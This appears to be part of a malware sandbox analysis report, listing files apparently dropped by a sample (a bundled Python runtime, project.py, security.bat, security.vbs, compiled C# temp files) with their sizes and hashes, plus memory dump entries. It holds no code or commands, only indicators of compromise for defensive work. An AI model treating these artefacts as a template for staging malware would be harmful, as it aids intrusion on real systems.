4d27a48545b57dd137ae35376fcf326d2064271084a487960686f8704b94de4a

SHA512
cf9d54474347d15ad1b8b89b2e58b850ad3595eec54173745bde86f94f75b39634be195a3aef69d71cb709ecff79c572a66b1458a86fa2779f043a83a5d4cc4c

Download Submit
C:\Users\Public\document\lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc
Filesize
7KB

MD5
6a42bf1e2b619716ef0f315d9ec8a0c8

SHA1
93e54d51cfab65806d0dd5c995cdc39b8f5a24df

SHA256
3ec69323ca359adf3f3cb3a7e5dd30078dd79e3f05f72da7754dfdf323467844

SHA512
95d054fa879346f3247682e5547e854dd1df79b2f8699aa679b711c19ffd69771757665249cca9b28f078f1e308ae2121946b0d479a78e60365dacb83f1bbc83

Download Submit
C:\Users\Public\document\lib\site-packages\distutils-precedence.pth
Filesize
151B

MD5
18d27e199b0d26ef9b718ce7ff5a8927

SHA1
ea9c9bfc82ad47e828f508742d7296e69d2226e4

SHA256
2638ce9e2500e572a5e0de7faed6661eb569d1b696fcba07b0dd223da5f5d224

SHA512
b8504949f3ddf0089164b0296e8371d7dcdd4c3761fb17478994f5e6943966528a45a226eba2d5286b9c799f0eb8c99bd20cbd8603a362532b3a65dd058fa42e

Download Submit
C:\Users\Public\document\lib\site-packages\pywin32.pth
Filesize
178B

MD5
322bf8d4899fb978d3fac34de1e476bb

SHA1
467808263e26b4349a1faf6177b007967fbc6693

SHA256
4f67ff92af0ea38bf18ac308efd976f781d84e56f579c603ed1e8f0c69a17f8d

SHA512
d7264690d653ac6ed4b3d35bb22b963afc53609a9d14187a4e0027528b618c224ed38e225330ceae2565731a4e694a6146b3214b3dcee75b053c8ae79f24a9dd

Download Submit
C:\Users\Public\document\lib\site-packages\requests\__init__.py
Filesize
4KB

MD5
6f460bf75e852040e1730c6cf1b16265

SHA1
3ab8d1fb8e3ea2f1848f3f04c4cfedc0c293761c

SHA256
2ef98a863233f261da297b610b632fe72919d5df76be8c9fde826977e56e0228

SHA512
cb853dab4480ff5e1bf882e1a41a1f4677f399ba050efefb4e4b11f8fde74083bb1ca2a4a8a3a158d26aafbade4eab7f8b942c0ccff2fbbdf0063eef5a2d9d20

Download Submit
C:\Users\Public\document\lib\site-packages\requests\__pycache__\__init__.cpython-310.pyc
Filesize
3KB

MD5
3bfd84fa7e6df3ba9f065a679b70915a

SHA1
ebe23ec8aca287ddfe34d6929de2709d7d4eb117

SHA256
f402c7839656a5e27afbb126abfc177ac4e42eb94d997e705ec59d6dcd1d5cdf

SHA512
5786b2d5b2c26481cf8536c48e8c6800efde3e2c89441823799d0c8d3ec9019b6a4dc20c415f96e83c8fb0fcbeac97d0f1abad90db781d713a517f4de9232de1

Download Submit
C:\Users\Public\document\lib\site-packages\urllib3\__init__.py
Filesize
4KB

MD5
a60c5ad1a4779bb766f5d94029aa40e3

SHA1
b7c32ce2c97d93456eb99a7721b5d48fdcbb7b9c

SHA256
0bc779ababb6f965f8cfc629552c58bcb5ce1d828d77083cdf0985b75267e951

SHA512
f5ec9f6ac6884a4eecfa5ee581e68ba9205b1777c226d9856b81e4301caf11ebd99f49367d8c49e54d3c86f32656cb2f05a8bae1a10c2603868674ff8744bc11

Download Submit
C:\Users\Public\document\lib\site-packages\urllib3\__pycache__\__init__.cpython-310.pyc
Filesize
3KB

MD5
838127d4488d236dffa399cdb11151d2

SHA1
6237d321690f5d895f016cd1470480d64d250484

SHA256
897385e37d024db7124c543b4939322d11e47471b0518b744812d6d2193fa7c1

SHA512
d9ce604ca17e8deb9180b635419926175476ac696144efdd105282301db958a6f829fadeab902ff49788a1dc5dc24a71047af5208ef42fe0bd600934f3bf4f2f

Download Submit
C:\Users\Public\document\lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc
Filesize
508B

MD5
172df533eca8101c8ee5e2e9cdab403e

SHA1
47ace8712cc3c28208392deb276d03baafed2fd3

SHA256
fd6d5d716ef68f06b18ce4d04b7c2d3e50a2da41f6a51db8ce7bc8426dcd7a63

SHA512
1fd7d617734eb3820ecc10607bc513fef7514753f04dd39218ec5bbba8ff3a925eec8feb695c03c5384b06a1f9d1d08ab9f4805349f1319ea8657ed61c56a8ad

Download Submit
C:\Users\Public\document\lib\site-packages\win32\lib\pywin32_bootstrap.py
Filesize
1KB

MD5
5d28a84aa364bcd31fdb5c5213884ef7

SHA1
0874dca2ad64e2c957b0a8fd50588fb6652dd8ee

SHA256
e298ddcfcb0232257fcaa330844845a4e7807c4e2b5bd938929ed1791cd9d192

SHA512
24c1ad9ce1d7e7e3486e8111d8049ef1585cab17b97d29c7a4eb816f7bdf34406aa678f449f8c680b7f8f3f3c8bc164edac95ccb15da654ef9df86c5beb199a5

Download Submit
C:\Users\Public\document\lib\site.py
Filesize
22KB

MD5
23cf5b302f557f7461555a35a0dc8c15

SHA1
50daac7d361ced925b7fd331f46a3811b2d81238

SHA256
73607e7b809237d5857b98e2e9d503455b33493cde1a03e3899aa16f00502d36

SHA512
e3d8449a8c29931433dfb058ab21db173b7aed8855871e909218da0c36beb36a75d2088a2d6dd849ec3e66532659fdf219de00184b2651c77392994c5692d86b

Download Submit
C:\Users\Public\document\lib\stat.py
Filesize
5KB

MD5
7a7143cbe739708ce5868f02cd7de262

SHA1
e915795b49b849e748cdbd8667c9c89fcdff7baf

SHA256
e514fd41e2933dd1f06be315fb42a62e67b33d04571435a4815a18f490e0f6ce

SHA512
7ecf6ac740b734d26d256fde2608375143c65608934aa51df7af34a1ee22603a790adc5b3d67d6944ba40f6f41064fa4d6957e000de441d99203755820e34d53

Download Submit
C:\Users\Public\document\lib\warnings.py
Filesize
19KB

MD5
75cdcbe366d13b7c463830d8faf2dbe5

SHA1
bbaa1236b789b5d2511a938a604361e32aea6d6f

SHA256
2b0c512178eaf53227cd7d336fbc5e055509048b8e1d9ce7cbb33d56b968d4ba

SHA512
e9b77e373f793355ba7822c39d141054b13772d4c2124e95cb8e9ffbc684d9ab2107ffdb5c9c8009e4541cd4f1169d3aef825ab398fb73151ba60d05963ea045

Download Submit
C:\Users\Public\document\python.exe
Filesize
100KB

MD5
a7f3026e4cf239f0a24a021751d17ae2

SHA1
3844f5b48e2135925c015796b6d9fc6c4a35b5c8

SHA256
3cce33d75d6fdae4e004d0bdf149320b3147482a9caf370079dcb9c191a1b260

SHA512
23d11bc0dd3ac4aa2ca0986d2f17a1c174cc6c6f28ffd8f04b2b228edd588ef030863d9fce3fcedc4a1f54b09e430c0f0628d123277326f3278d1b53c5632ec8

Download Submit
C:\Users\Public\document\python310.dll
Filesize
4.3MB

MD5
63a1fa9259a35eaeac04174cecb90048

SHA1
0dc0c91bcd6f69b80dcdd7e4020365dd7853885a

SHA256
14b06796f288bc6599e458fb23a944ab0c843e9868058f02a91d4606533505ed

SHA512
896caa053f48b1e4102e0f41a7d13d932a746eea69a894ae564ef5a84ef50890514deca6496e915aae40a500955220dbc1b1016fe0b8bcdde0ad81b2917dea8b

Download Submit
C:\Users\Public\project.py
Filesize
404B

MD5
a6c41e0cb8112f48ffe45011fe87e81c

SHA1
5d719b3d7b6bb069b79227c3c99ce023a93b59db

SHA256
db44556a0a5395ec4861c5b89bebd922d1a0e511a277ea30c6efd80a8a2db9a1

SHA512
d373640643d9561590c9ebb368aaef4637fab470849ffbea65c3cd4ab1b9a2ce687d39b4a4056d917b7367abf542ea0a5225261fb81a3d997a6d8edd8ae4fd03

Download Submit
C:\Users\Public\security.bat
Filesize
9KB

MD5
43b59ce5c77eefc1da8c0c1afc826fab

SHA1
f9d81faab518e2688b981f2bc229b3fc9ecdf6e6

SHA256
289f8d26c15e4dd7f008f627612e3eb89d466ca1f815b48a4db447faf2b9543b

SHA512
c6c5214b2f50530ecdeb21528ce4c481efee197854f07714634367ba3d4885c60200bc9fdbbbd6a495cf7afacdc15ee3516e0bd6cff219d45cd5b3128114fef2

Download Submit
C:\Users\Public\security.vbs
Filesize
310B

MD5
9f313cf7ab02145bc5fab21d485bf2ba

SHA1
f41b8dd40419d77b6e973fcf9bc68f0859cc4217

SHA256
5c084ce395b45d181be1fe9f8ac8001aa028f249084517d114bf0c00275dfdd2

SHA512
e780be801a0b039358ac457304fcda217ea346701996d5dddf1e279c0ef64b7d44ec84d61b0932acf6e6b85c9d8ca8e279e4c235d1e984ead5e15e1f07280d09

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\c4g5b13g\CSC18565F261FB4E879CB3AF5F6A69BEEF.TMP
Filesize
652B

MD5
0fc0404200fef60caf9ee612f5e804e5

SHA1
4257c37afd374f493e5e8f2199dc3e111815ca6a

SHA256
b5ebe306a983fbb75943bac0c2f277f5619b29da03a6d674ffb4dc03fafdd55b

SHA512
fe91ffe9ca0a1898fb807d580f0e65227cdc3f88a62510c41886e6ed5e670d4e5c4f527ed314d83f77ae8ee9a8caccc589a9427eda2ff75691d08d1bd35c8d9d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\c4g5b13g\c4g5b13g.0.cs
Filesize
237B

MD5
a6e80541a483188dbce2f3d843fcbe4d

SHA1
a1f2e13a3314ab6a676751936c7b3b9a9fb9103e

SHA256
d5b10c7f3cbb62cbf4772a7b178c578c8abaa3fe9a7420decbff18d81f08ccd9

SHA512
6f60f86688dc256a668b6e3e8529820cf8253c47c6a1126f3097576f36b5c220f32febabce65e25dfa5b824dc2200b7ca7aca2c3bc3b8314cadb734a589b6337

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\c4g5b13g\c4g5b13g.cmdline
Filesize
369B

MD5
7509c6fc880fa424420f01f86ab2e395

SHA1
0971ac9df7c12ea68da3db041ab4d87ae8fd38cb

SHA256
de8b83ef05bd5b1b1afbe4d2184d927ea54ff72dcc939f6e6c3caf644c7ff0db

SHA512
049906e482d93a1f2dd9d53e1ec68035ac4ad5098f7a599773b5f44ad6683d7188ebd2439f477022b6ed3118f7baed4b4a39ed4c271c04cda0aed45fc0e89ea4

Download Submit
memory/376-126-0x000001CFA1D80000-0x000001CFA1D8A000-memory.dmp

Filesize
40KB

Download
memory/376-125-0x000001CFA2110000-0x000001CFA2122000-memory.dmp

Filesize
72KB

Download
memory/2372-48-0x0000018025A10000-0x0000018025B86000-memory.dmp

Filesize
1.5MB

Download
memory/2372-49-0x0000018025DA0000-0x0000018025FAA000-memory.dmp

Filesize
2.0MB

Download
memory/2372-45-0x0000018025720000-0x0000018025728000-memory.dmp

Filesize
32KB

Download
memory/3752-1-0x000001FCA2330000-0x000001FCA2352000-memory.dmp

Filesize
136KB

Download
memory/3752-0-0x00007FFE86A93000-0x00007FFE86A95000-memory.dmp

Filesize
8KB

Download
memory/3752-11-0x00007FFE86A90000-0x00007FFE87551000-memory.dmp

Filesize
10.8MB

Download
memory/3752-12-0x00007FFE86A90000-0x00007FFE87551000-memory.dmp

Filesize
10.8MB

Download
memory/3752-20-0x00007FFE86A90000-0x00007FFE87551000-memory.dmp

Filesize
10.8MB

Download
memory/7028-4685-0x00000206BE300000-0x00000206BE308000-memory.dmp

Filesize
32KB

Download